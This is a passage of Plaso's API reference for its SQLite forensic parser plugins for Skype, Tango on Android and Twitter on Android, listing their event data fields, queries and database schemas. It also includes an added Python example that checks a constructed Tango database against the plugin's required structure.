INTEGER, opt_history_limit_in_days INTEGER, opt_admin_only_activities INTEGER, passwordhint TEXT, meta_name TEXT, meta_topic TEXT, meta_guidelines TEXT, meta_picture BLOB, picture TEXT, is_p2p_migrated INTEGER, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, guid TEXT, dialog_partner TEXT, meta_description TEXT, premium_video_sponsor_list TEXT, mcr_caller TEXT, chat_dbid INTEGER, history_horizon INTEGER, history_sync_state TEXT, thread_version TEXT, consumption_horizon_set_at INTEGER, alt_identity TEXT, extprop_profile_height INTEGER, extprop_chat_width INTEGER, extprop_chat_left_margin INTEGER, extprop_chat_right_margin INTEGER, extprop_entry_height INTEGER, extprop_windowpos_x INTEGER, extprop_windowpos_y INTEGER, extprop_windowpos_w INTEGER, extprop_windowpos_h INTEGER, extprop_window_maximized INTEGER, extprop_window_detached INTEGER, extprop_pinned_order INTEGER, extprop_new_in_inbox INTEGER, extprop_tab_order INTEGER, extprop_video_layout INTEGER, extprop_video_chat_height INTEGER, extprop_chat_avatar INTEGER, extprop_consumption_timestamp INTEGER, extprop_form_visible INTEGER, extprop_recovery_mode INTEGER)', 'DbMeta': 'CREATE TABLE DbMeta (key TEXT NOT NULL PRIMARY KEY, value TEXT)', 'LegacyMessages': 'CREATE TABLE LegacyMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER)', 'Messages': 'CREATE TABLE Messages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, chatname TEXT, author TEXT, from_dispname TEXT, author_was_live INTEGER, guid BLOB, dialog_partner TEXT, timestamp INTEGER, type INTEGER, sending_status INTEGER, consumption_status INTEGER, edited_by TEXT, edited_timestamp INTEGER, param_key INTEGER, param_value INTEGER, body_xml TEXT, identities TEXT, reason TEXT, leavereason INTEGER, participant_count INTEGER, error_code INTEGER, chatmsg_type INTEGER, chatmsg_status INTEGER, body_is_rawxml INTEGER, oldoptions INTEGER, newoptions INTEGER, newrole INTEGER, pk_id INTEGER, crc INTEGER, remote_id 
INTEGER, call_guid TEXT, extprop_contact_review_date TEXT, extprop_contact_received_stamp INTEGER, extprop_contact_reviewed INTEGER)', 'Participants': 'CREATE TABLE Participants (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, identity TEXT, rank INTEGER, requested_rank INTEGER, text_status INTEGER, voice_status INTEGER, video_status INTEGER, live_identity TEXT, live_price_for_me TEXT, live_fwd_identities TEXT, live_start_timestamp INTEGER, sound_level INTEGER, debuginfo TEXT, next_redial_time INTEGER, nrof_redials_left INTEGER, last_voice_error TEXT, quality_problems TEXT, live_type INTEGER, live_country TEXT, transferred_by TEXT, transferred_to TEXT, adder TEXT, last_leavereason INTEGER, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, live_identity_to_use TEXT, livesession_recovery_in_progress INTEGER, is_multiparty_video_updatable INTEGER, real_identity TEXT, extprop_default_identity INTEGER)', 'SMSes': 'CREATE TABLE SMSes (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, outgoing_reply_type INTEGER, status INTEGER, failurereason INTEGER, is_failed_unseen INTEGER, timestamp INTEGER, price INTEGER, price_precision INTEGER, price_currency TEXT, reply_to_number TEXT, target_numbers TEXT, target_statuses BLOB, body TEXT, chatmsg_id INTEGER, identity TEXT, notification_id INTEGER, event_flags INTEGER, reply_id_number TEXT, convo_name TEXT, extprop_hide_from_history INTEGER, extprop_extended INTEGER)', 'Transfers': 'CREATE TABLE Transfers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, starttime INTEGER, finishtime INTEGER, filepath TEXT, filename TEXT, filesize TEXT, bytestransferred TEXT, bytespersecond INTEGER, chatmsg_guid BLOB, chatmsg_index INTEGER, convo_id INTEGER, pk_id INTEGER, nodeid BLOB, last_activity INTEGER, flags INTEGER, old_status INTEGER, old_filepath INTEGER, accepttime INTEGER, 
parent_id INTEGER, offer_send_list TEXT, extprop_localfilename TEXT, extprop_hide_from_history INTEGER, extprop_window_visible INTEGER, extprop_handled_by_chat INTEGER)', 'VideoMessages': 'CREATE TABLE VideoMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, qik_id BLOB, attached_msg_ids TEXT, sharing_id TEXT, status INTEGER, vod_status INTEGER, vod_path TEXT, local_path TEXT, public_link TEXT, progress INTEGER, title TEXT, description TEXT, author TEXT, creation_timestamp INTEGER)', 'Videos': 'CREATE TABLE Videos (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, error TEXT, debuginfo TEXT, dimensions TEXT, media_type INTEGER, duration_1080 INTEGER, duration_720 INTEGER, duration_hqv INTEGER, duration_vgad2 INTEGER, duration_ltvgad2 INTEGER, timestamp INTEGER, hq_present INTEGER, duration_ss INTEGER, ss_timestamp INTEGER, convo_id INTEGER, device_path TEXT)', 'Voicemails': 'CREATE TABLE Voicemails (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, subject TEXT, timestamp INTEGER, duration INTEGER, allowed_duration INTEGER, playback_progress INTEGER, convo_id INTEGER, chatmsg_guid BLOB, notification_id INTEGER, flags INTEGER, size INTEGER, path TEXT, failures INTEGER, vflags INTEGER, xmsg TEXT, extprop_hide_from_history INTEGER)'}]
class plaso.parsers.sqlite_plugins.skype.SkypeSMSEventData
Bases: plaso.containers.events.EventData
Skype SMS event data.
number: phone number where the SMS was sent.
Type str
text: text (SMS body) that was sent.
Type str
DATA_TYPE = 'skype:event:sms'
class plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventData
Bases: plaso.containers.events.EventData
Skype file transfer event data.
action_type: action type such as: “GETSOLICITUDE”, “SENDSOLICITUDE”, “ACCEPTED” or “FINISHED”.
Type str
destination: account that received the file.
Type str
source: account that sent the file.
Type str
transferred_filename: name of the file transferred.
Type str
transferred_filepath: path of the file transferred.
Type str
transferred_filesize: size of the file transferred.
Type int
DATA_TYPE = 'skype:event:transferfile'
plaso.parsers.sqlite_plugins.tango_android module
SQLite parser plugin for Tango on Android database files.
class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData
Bases: plaso.containers.events.EventData
Tango on Android contact event data.
first_name: contact profile first name.
Type str
last_name: contact profile last name.
Type str
birthday: contact profile birthday.
Type str
gender: contact profile gender.
Type str
status: contact status message.
Type str
distance: contact profile distance.
Type int
is_friend: True if the contact is considered a friend.
Type bool
friend_request_type: flag indicating the type of friend request sent, for example outRequest for a request that was sent or noRequest for no request.
Type str
friend_request_message: message sent with the friend request.
Type str
DATA_TYPE = 'tango:android:contact'
class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventData
Bases: plaso.containers.events.EventData
Tango on Android conversation event data.
conversation_identifier: conversation identifier.
Type int
DATA_TYPE = 'tango:android:conversation'
class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventData
Bases: plaso.containers.events.EventData
Tango on Android message event data.
message_identifier: message identifier.
Type int
direction: flag indicating the direction of the message.
Type int
DATA_TYPE = 'tango:android:message'
class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Tango on Android profile database files.
DATA_FORMAT = 'Tango on Android profile SQLite database file'
NAME = 'tango_android_profile'
ParseContactRow(parser_mediator, query, row, **unused_kwargs)
Parses a contact row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT itemLastActiveTime AS last_active_time, itemLastLocalAccessTime AS last_access_time, itemFriendRequestTime AS friend_request_time, itemFirstName AS first_name, itemLastName AS last_name, itemBirthday AS birthday, itemGender AS gender, itemStatus AS status, itemDistance AS distance, itemIsFriend AS friend, itemFriendRequestType AS friend_request_type, itemFriendRequestMessage AS friend_request_message FROM profiletable', 'ParseContactRow')]
REQUIRED_STRUCTURE = {'profiletable': frozenset({'itemBirthday', 'itemDistance', 'itemFirstName', 'itemFriendRequestMessage', 'itemFriendRequestTime', 'itemFriendRequestType', 'itemGender', 'itemIsFriend', 'itemLastActiveTime', 'itemLastLocalAccessTime', 'itemLastName', 'itemStatus'})}
SCHEMAS = [{'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'profiletable': 'CREATE TABLE `profiletable` (`itemUserId` TEXT PRIMARY KEY, `itemFirstName` TEXT NOT NULL, `itemLastName` TEXT NOT NULL, `itemBirthday` TEXT NOT NULL, `itemGender` TEXT NOT NULL, `itemStatus` TEXT NOT NULL, `itemLastActiveTime` BIGINT NOT NULL, `itemDistance` DOUBLE NOT NULL, `itemCity` TEXT NOT NULL, `itemGeoCountryCode` TEXT NOT NULL, `itemAvatarUrl` TEXT NOT NULL, `itemThumbnailUrl` TEXT NOT NULL, `itemVideoUrl` TEXT NOT NULL, `itemVideoThumbnailUrl` TEXT NOT NULL, `itemBackgroundUrl` TEXT NOT NULL, `itemIsFriend` INTEGER NOT NULL, `itemIsBlocked` INTEGER NOT NULL, `itemFriendRequestType` TEXT NOT NULL, `itemReverseRelationships` TEXT NOT NULL, `itemFavoriterCount` INTEGER NOT NULL, `itemFavoritingCount` INTEGER NOT NULL, `itemFeedCount` INTEGER NOT NULL, `itemRefereneCount` INTEGER NOT NULL, `itemLevel1DataSyncTime` BIGINT NOT NULL, `itemLevel2DataSyncTime` BIGINT NOT NULL, `itemLevel3DataSyncTime` BIGINT NOT NULL, `itemLevel4DataSyncTime` BIGINT NOT NULL, `itemLevel5DataSyncTime` BIGINT NOT NULL, `itemLastLocalAccessTime` BIGINT NOT NULL, `itemFriendRequestId` TEXT NOT NULL, `itemFriendRequestMessage` TEXT NOT NULL, `itemFriendRequestTime` BIGINT NOT NULL, `itemIsNewFriendRequest` INTEGER NOT NULL, `itemFriendRequestTCMessageId` INTEGER NOT NULL, `itemFriendRequestContext` TEXT NOT NULL, `itemFriendRequestAttachedPostType` INTEGER NOT NULL, `itemFriendRequestAttachedPostContent` TEXT NOT NULL, `itemFriendRequestHasBeenForwardedToTc` INTEGER NOT NULL, `itemProfileType` TEXT NOT NULL, `itemDatingAge` INTEGER NOT NULL, `itemDatingLocationString` TEXT NOT NULL, `itemDatingSeekingString` TEXT NOT NULL, `itemDatingEssayText` TEXT NOT NULL, `itemDatingBodyType` TEXT NOT NULL, `itemDatingLastActive` TEXT NOT NULL, `itemDatingProfileUrl` TEXT NOT NULL, `itemLastTimeOfLikeProfile` BIGINT NOT NULL, `itemIsHidden` INTEGER NOT NULL, `itemPrivacy` INTEGER NOT NULL, 
`itemCanSeeMyPost` INTEGER NOT NULL, `itemCanShareMyPost` INTEGER NOT NULL, `itemCanContactMe` INTEGER NOT NULL)'}]
class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidTCPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Tango on Android TC database files.
DATA_FORMAT = 'Tango on Android TC SQLite database file'
NAME = 'tango_android_tc'
ParseConversationRow(parser_mediator, query, row, **unused_kwargs)
Parses a conversation row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
Parses a message row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT conversations.conv_id AS conv_id, conversations.payload AS payload FROM conversations', 'ParseConversationRow'), ('SELECT messages.create_time AS create_time, messages.send_time AS send_time, messages.msg_id AS msg_id, messages.payload AS payload, messages.direction AS direction FROM messages LEFT JOIN likes ON messages.msg_id = likes.msg_id', 'ParseMessageRow')]
REQUIRED_STRUCTURE = {'conversations': frozenset({'conv_id', 'payload'}), 'likes': frozenset({'msg_id'}), 'messages': frozenset({'create_time', 'direction', 'msg_id', 'payload', 'send_time'})}
SCHEMAS = [{'conversations': 'CREATE TABLE `conversations` (`conv_id` TEXT PRIMARY KEY, `conv_type` INTEGER DEFAULT 0, `payload` BLOB, `last_msg_id` INTEGER, `unread_count` INTEGER, `last_read_sent_msg_id` INTEGER, `conv_del_status` INTEGER DEFAULT 0, `deleting_ts` BIGINT DEFAULT 0, `conv_restore_status` INTEGER DEFAULT 0, `peers_read` TEXT, `total_received_msg_count` INTEGER DEFAULT -1, `communication_context` INTEGER DEFAULT 0)', 'games': 'CREATE TABLE `games` (`game_session_id` TEXT PRIMARY KEY, `message_id` INTEGER, `conversation_id` TEXT, `game_id` TEXT, `game_state` INTEGER, `action_timestamp` BIGINT, `current_player_account_id` TEXT)', 'likes': 'CREATE TABLE `likes` (`msg_id` INTEGER PRIMARY KEY, `global_msg_id` TEXT, `conv_id` TEXT, `liker_aid` TEXT, `act_type` INTEGER, `status` INTEGER, `act_ts` BIGINT, `payload` BLOB)', 'messages': 'CREATE TABLE `messages` (`msg_id` INTEGER PRIMARY KEY, `conv_id` TEXT, `type` INTEGER, `media_id` TEXT, `share_id` TEXT, `create_time` BIGINT, `send_time` BIGINT, `direction` INTEGER, `status` INTEGER, `payload` BLOB, `del_status` INTEGER)', 'profiles': 'CREATE TABLE `profiles` (`key` TEXT PRIMARY KEY, `value` TEXT)', 'receipts': 'CREATE TABLE `receipts` (`conv_id` TEXT PRIMARY KEY, `msg_id` INTEGER, `sender_msg_id` INTEGER, `sender_aids` TEXT, `type` INTEGER, `create_time` BIGINT, `status` INTEGER, `payload` BLOB)', 'sms': 'CREATE TABLE `sms` (`msg_id` INTEGER PRIMARY KEY, `phonenumber` TEXT, `text` TEXT)'}]
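As an added example (not Plaso's own code), the Python below shows how the REQUIRED_STRUCTURE and QUERIES entries of the tango_android_tc plugin fit together: it introspects the tables and columns of a SQLite database, reports what is missing against the required structure, and only then runs the ParseMessageRow query. The three CREATE TABLE statements and the query are copied from the SCHEMAS and QUERIES entries above; the structure check is this example's own implementation (not the one in plaso.parsers.sqlite_plugins.interface), and the database rows are constructed.

```python
import sqlite3

# REQUIRED_STRUCTURE of the tango_android_tc plugin, copied from the
# reference entry above: table name -> column names the plugin needs.
TANGO_TC_REQUIRED_STRUCTURE = {
    'conversations': frozenset({'conv_id', 'payload'}),
    'likes': frozenset({'msg_id'}),
    'messages': frozenset(
        {'create_time', 'direction', 'msg_id', 'payload', 'send_time'}),
}

# The ParseMessageRow query of the plugin, copied from its QUERIES entry.
TANGO_TC_MESSAGE_QUERY = (
    'SELECT messages.create_time AS create_time, '
    'messages.send_time AS send_time, messages.msg_id AS msg_id, '
    'messages.payload AS payload, messages.direction AS direction '
    'FROM messages LEFT JOIN likes ON messages.msg_id = likes.msg_id')

# CREATE TABLE statements from the plugin's SCHEMAS entry, limited to the
# three tables the required structure refers to.
TANGO_TC_SCHEMA = [
    'CREATE TABLE `conversations` (`conv_id` TEXT PRIMARY KEY, '
    '`conv_type` INTEGER DEFAULT 0, `payload` BLOB, `last_msg_id` INTEGER, '
    '`unread_count` INTEGER, `last_read_sent_msg_id` INTEGER, '
    '`conv_del_status` INTEGER DEFAULT 0, `deleting_ts` BIGINT DEFAULT 0, '
    '`conv_restore_status` INTEGER DEFAULT 0, `peers_read` TEXT, '
    '`total_received_msg_count` INTEGER DEFAULT -1, '
    '`communication_context` INTEGER DEFAULT 0)',
    'CREATE TABLE `likes` (`msg_id` INTEGER PRIMARY KEY, `global_msg_id` TEXT, '
    '`conv_id` TEXT, `liker_aid` TEXT, `act_type` INTEGER, `status` INTEGER, '
    '`act_ts` BIGINT, `payload` BLOB)',
    'CREATE TABLE `messages` (`msg_id` INTEGER PRIMARY KEY, `conv_id` TEXT, '
    '`type` INTEGER, `media_id` TEXT, `share_id` TEXT, `create_time` BIGINT, '
    '`send_time` BIGINT, `direction` INTEGER, `status` INTEGER, '
    '`payload` BLOB, `del_status` INTEGER)',
]


def get_table_columns(connection):
    """Maps every table in a SQLite database to the set of its column names."""
    tables = {}
    names = connection.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
    for (table_name,) in names:
        # PRAGMA table_info rows are (cid, name, type, notnull, dflt_value, pk).
        pragma = 'PRAGMA table_info("{0:s}")'.format(
            table_name.replace('"', '""'))
        columns = connection.execute(pragma).fetchall()
        tables[table_name] = frozenset(column[1] for column in columns)
    return tables


def check_required_structure(connection, required_structure):
    """Returns the (table, column) pairs the database is missing.

    An empty list means the database satisfies the plugin's REQUIRED_STRUCTURE,
    so its QUERIES can be run. A missing table is reported as (table, None).
    """
    present_tables = get_table_columns(connection)
    missing = []
    for table_name, required_columns in sorted(required_structure.items()):
        present_columns = present_tables.get(table_name)
        if present_columns is None:
            missing.append((table_name, None))
            continue
        for column_name in sorted(required_columns - present_columns):
            missing.append((table_name, column_name))
    return missing


def build_sample_tc_database(with_likes_table=True):
    """Builds a constructed in-memory TC database holding two fake messages."""
    connection = sqlite3.connect(':memory:')
    for statement in TANGO_TC_SCHEMA:
        if not with_likes_table and statement.startswith('CREATE TABLE `likes`'):
            continue
        connection.execute(statement)
    connection.execute(
        'INSERT INTO conversations (conv_id, payload) VALUES (?, ?)',
        ('conv-1', b'\x00'))
    # Constructed rows: the BIGINT times are assumed to be milliseconds since
    # the Unix epoch, direction values are arbitrary, payloads are placeholders.
    connection.executemany(
        'INSERT INTO messages (msg_id, conv_id, create_time, send_time, '
        'direction, payload) VALUES (?, ?, ?, ?, ?, ?)',
        [(1, 'conv-1', 1600000000000, 1600000001000, 1, b'hello'),
         (2, 'conv-1', 1600000100000, 1600000101000, 2, b'reply')])
    connection.commit()
    return connection


def run_message_query(connection):
    """Runs the plugin's message query; returns dicts keyed by the column
    aliases that the ParseMessageRow callback reads, ordered by msg_id."""
    connection.row_factory = sqlite3.Row
    rows = connection.execute(TANGO_TC_MESSAGE_QUERY).fetchall()
    return sorted((dict(row) for row in rows), key=lambda row: row['msg_id'])


if __name__ == '__main__':
    database = build_sample_tc_database()
    print('missing:', check_required_structure(
        database, TANGO_TC_REQUIRED_STRUCTURE))
    for row in run_message_query(database):
        print(row['msg_id'], row['direction'], row['create_time'], row['payload'])
```

Run check_required_structure before the query: when the likes table is absent the check reports ('likes', None), and the LEFT JOIN in the query would otherwise fail at execution time, which is exactly what the REQUIRED_STRUCTURE test is there to catch before a plugin is run against an unrelated SQLite file.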
plaso.parsers.sqlite_plugins.twitter_android module
SQLite parser plugin for Twitter on Android database files.
class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidContactEventData
Bases: plaso.containers.events.EventData
Twitter on Android contact event data.
identifier: contact row id.
Type int
user_identifier: twitter account id.
Type int
username: twitter account handle.
Type str
name: twitter account name.
Type str
description: twitter account profile description.
Type str
web_url: twitter account profile URL content.
Type str
location: twitter account profile location content.
Type str
followers: number of followers.
Type int
friends: number of accounts followed (the following count).
Type int
statuses: twitter account number of tweets.
Type int
image_url: profile picture URL.
Type str
DATA_TYPE = 'twitter:android:contact'
class plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Twitter on Android database files.
DATA_FORMAT = 'Twitter on Android SQLite database file'
NAME = 'twitter_android'
ParseContactRow(parser_mediator, query, row, **unused_kwargs)
Parses a contact row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseSearchRow(parser_mediator, query, row, **unused_kwargs)
Parses a search row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
ParseStatusRow(parser_mediator, query, row, **unused_kwargs)
Parses a status row from the database.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row resulting from query.
QUERIES = [('SELECT name, query, time FROM search_queries', 'ParseSearchRow'), ('SELECT statuses._id AS _id, statuses.author_id AS author_id, users.username AS username, statuses.content AS content, statuses.created AS time, statuses.favorited AS favorited, statuses.retweeted AS retweeted FROM statuses LEFT JOIN users ON statuses.author_id = users.user_id', 'ParseStatusRow'), ('SELECT _id, user_id, username, name, profile_created, description, web_url, location, followers, friends, statuses, image_url, updated, friendship_time FROM users', 'ParseContactRow')]
REQUIRED_STRUCTURE = {'search_queries': frozenset({'name', 'query', 'time'}), 'statuses': frozenset({'_id', 'author_id', 'content', 'created', 'favorited', 'retweeted'}), 'users': frozenset({'_id', 'description', 'followers', 'friends', 'friendship_time', 'image_url', 'location', 'name', 'profile_created', 'statuses', 'updated', 'user_id', 'username', 'web_url'})}
SCHEMAS = [{'activities': 'CREATE TABLE activities (_id INTEGER PRIMARY KEY,type INT,event INT,created_at INT,hash INT,max_position INT,min_position INT,sources_size INT,source_type INT,sources BLOB,targets_size INT,target_type INT,targets BLOB,target_objects_size INT,target_object_type INT,target_objects BLOB,is_last INT,tag INT,magic_rec_id INT,UNIQUE (type, max_position) ON CONFLICT REPLACE)', 'ads_account_permissions': 'CREATE TABLE ads_account_permissions (_id INTEGER PRIMARY KEY,promotable_users BLOB,last_synced INT NOT NULL)', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'business_profiles': 'CREATE TABLE business_profiles (_id INTEGER PRIMARY KEY,user_id INT UNIQUE NOT NULL,business_profile BLOB,last_synced INT NOT NULL)', 'card_state': 'CREATE TABLE card_state (_id INTEGER PRIMARY KEY AUTOINCREMENT,card_status_id INT,card_id INT, card_state BLOB)', 'category_timestamp': 'CREATE TABLE category_timestamp (_id INTEGER PRIMARY KEY,cat_status_id INT NOT NULL,cat_tag INT NOT NULL,cat_timestamp INT NOT NULL)', 'clusters': 'CREATE TABLE clusters (_id INTEGER PRIMARY KEY,cl_cluster_id TEXT UNIQUE NOT NULL,cl_type INT,cl_title TEXT,cl_subtitle TEXT,cl_size INT,cl_timestamp INT,cl_content BLOB)', 'conversation_entries': 'CREATE TABLE conversation_entries (_id INTEGER PRIMARY KEY,entry_id INT UNIQUE NOT NULL,sort_entry_id INT UNIQUE NOT NULL,conversation_id TEXT,user_id INT,created INT,entry_type INT,data BLOB,request_id TEXT)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY,conversation_id TEXT NOT NULL,user_id TEXT NOT NULL,join_time INT NOT NULL,participant_type INT NOT NULL)', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY,conversation_id TEXT UNIQUE NOT NULL,title TEXT,avatar_url TEXT,type INT,sort_event_id BIGINT,last_readable_event_id BIGINT,last_read_event_id BIGINT,sort_timestamp BIGINT,is_muted INT,min_event_id BIGINT,is_hidden INT,has_more INT,read_only INT)', 
'cursors': 'CREATE TABLE cursors (_id INTEGER PRIMARY KEY,kind INT,type INT,owner_id INT,ref_id TEXT,next TEXT)', 'dismiss_info': 'CREATE TABLE dismiss_info(timeline_id INTEGER REFERENCES timeline(_id),feedback_action_id INTEGER REFERENCES feedback_action(_id),UNIQUE(timeline_id,feedback_action_id))', 'feedback_action': 'CREATE TABLE feedback_action(_id INTEGER PRIMARY KEY AUTOINCREMENT,feedback_type TEXT,prompt TEXT,confirmation TEXT,UNIQUE(feedback_type,prompt,confirmation))', 'list_mapping': 'CREATE TABLE list_mapping (_id INTEGER PRIMARY KEY,list_mapping_list_id TEXT,list_mapping_type INT,list_mapping_user_id INT,list_is_last INT)', 'locations': 'CREATE TABLE locations (_id INTEGER PRIMARY KEY,name TEXT,woeid INT,country TEXT,country_code TEXT)', 'moments': 'CREATE TABLE moments (_id INTEGER PRIMARY KEY,title TEXT NOT NULL,can_subscribe INT,is_live INT,is_sensitive INT,subcategory_string TEXT,subcategory_favicon_url TEXT,time_string TEXT,duration_string TEXT,is_subscribed INT,description TEXT NOT NULL,moment_url TEXT,num_subscribers INT,author_info BLOB,promoted_content BLOB)', 'moments_guide': 'CREATE TABLE moments_guide (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,section_id INT NOT NULL,tweet_id INT NOT NULL, crop_data BLOB,media_id INT,media_url TEXT,media_size BLOB,FOREIGN KEY(section_id) REFERENCES moments_sections(_id) ON DELETE CASCADE)', 'moments_guide_categories': 'CREATE TABLE moments_guide_categories (_id INTEGER PRIMARY KEY,category_id TEXT NOT NULL,is_default_category INT NOT NULL,category_name TEXT NOT NULL,fetch_timestamp INT NOT NULL)', 'moments_guide_user_states': 'CREATE TABLE moments_guide_user_states (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,is_read INT,is_updated INT,FOREIGN KEY(moment_id) REFERENCES moments(_id) ON DELETE CASCADE)', 'moments_pages': 'CREATE TABLE moments_pages (_id INTEGER PRIMARY KEY,moment_id INT NOT NULL,page_id TEXT,type BLOB,tweet_id INT,display_mode BLOB,page_number INT,crop_data BLOB,theme_data 
BLOB,media_id INT,media_size BLOB,media_url TEXT,last_read_timestamp INT,FOREIGN KEY(moment_id) REFERENCES moments(_id))', 'moments_sections': 'CREATE TABLE moments_sections (_id INTEGER PRIMARY KEY,section_title TEXT,section_type BLOB NOT NULL,section_group_id TEXT,section_group_type INT NOT NULL)', 'moments_visit_badge': 'CREATE TABLE moments_visit_badge (_id INTEGER PRIMARY KEY,moment_id INT UNIQUE NOT NULL,is_new_since_visit INT,is_updated_since_visit INT)', 'news': 'CREATE TABLE news (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,topic_id INT,news_id TEXT,title TEXT,image_url TEXT,author_name TEXT,article_description TEXT,article_url TEXT,tweet_count INT,start_time INT,news_id_hash INT)', 'notifications': 'CREATE TABLE notifications (_id INTEGER PRIMARY KEY,type INT,notif_id INT,source_user_name TEXT,s_name TEXT,s_id INT,notif_txt TEXT,aggregation_data TEXT,notif_extra_data BLOB)', 'one_click': 'CREATE TABLE one_click (_id INTEGER PRIMARY KEY,topic TEXT,filter_name TEXT,filter_location TEXT,filter_follow INT)', 'order_history': 'CREATE TABLE order_history (_id INTEGER PRIMARY KEY,ordered_at INT ,order_id INT ,data BLOB)', 'promoted_retry': 'CREATE TABLE promoted_retry(impression_id TEXT,event INT NOT NULL,is_earned INT NOT NULL,trend_id INT,num_retries INT NOT NULL,url TEXT,video_playlist_url TEXT,video_content_uuid TEXT,video_content_type TEXT,video_cta_url TEXT,video_cta_app_id TEXT,video_cta_app_name TEXT,card_event TEXT,PRIMARY KEY(impression_id,event,is_earned,trend_id))', 'prompts': 'CREATE TABLE prompts (_id INTEGER PRIMARY KEY,p_id INT,p_format TEXT,p_template TEXT,p_header TEXT,p_text TEXT,p_action_text TEXT,p_action_url TEXT,p_icon TEXT,p_background_image_url TEXT,p_persistence TEXT,p_entities BLOB,p_header_entities BLOB,p_status_id LONG,p_insertion_index INT,p_trigger TEXT)', 'rankings': 'CREATE TABLE rankings (_id INTEGER PRIMARY KEY AUTOINCREMENT,country TEXT,language TEXT,granularity TEXT,category TEXT,date INT)', 
'search_queries': 'CREATE TABLE search_queries (_id INTEGER PRIMARY KEY,type INT,name TEXT NOT NULL,query TEXT NOT NULL,query_id INT,time INT,latitude REAL,longitude REAL,radius REAL,location TEXT,pc BLOB,cluster_titles BLOB)', 'search_results': 'CREATE TABLE search_results (_id INTEGER PRIMARY KEY,search_id INT,s_type INT,data_type INT,type_id INT,polled INT,data_id INT,related_data BLOB,cluster_id INT)', 'search_suggestion_metadata': 'CREATE TABLE search_suggestion_metadata (_id INTEGER PRIMARY KEY,type INT,last_update LONG)', 'status_groups': 'CREATE TABLE status_groups (_id INTEGER PRIMARY KEY,tweet_type INT DEFAULT 0,type INT,sender_id INT,owner_id INT,ref_id INT,tag INT,g_status_id INT,is_read INT,page INT,is_last INT,updated_at INT,timeline INT,pc BLOB,g_flags INT,preview_draft_id INT,preview_media BLOB,tweet_pivots BLOB)', 'status_metadata': 'CREATE TABLE status_metadata (_id INTEGER PRIMARY KEY,owner_id INT NOT NULL,status_id INT NOT NULL,status_group INT NOT NULL,status_group_tag INT NOT NULL,soc_type INT,soc_name TEXT,soc_second_name TEXT,soc_others_count INT,soc_fav_count INT,soc_rt_count INT,reason_icon_type TEXT,reason_text TEXT,scribe_component TEXT,scribe_data BLOB,highlights TEXT)', 'statuses': 'CREATE TABLE statuses (_id INTEGER PRIMARY KEY,status_id INT UNIQUE NOT NULL,author_id INT,content TEXT,source TEXT,created INT,in_r_user_id INT,in_r_status_id INT,favorited INT,latitude TEXT,longitude TEXT,place_data BLOB,entities TEXT,retweet_count INT,r_content TEXT,cards BLOB,flags INT,favorite_count INT,lang TEXT,supplemental_language TEXT,view_count INT,quoted_tweet_data BLOB,quoted_tweet_id INT,retweeted INT)', 'stories': 'CREATE TABLE stories ( _id INTEGER PRIMARY KEY,story_id TEXT,story_order INT,story_type INT,story_proof_type INT,story_proof_addl_count INT,data_type INT,data_id INT,story_is_read INT,story_meta_title TEXT,story_meta_subtitle TEXT,story_meta_query TEXT,story_meta_header_img_url TEXT,story_source TEXT,story_impression_info 
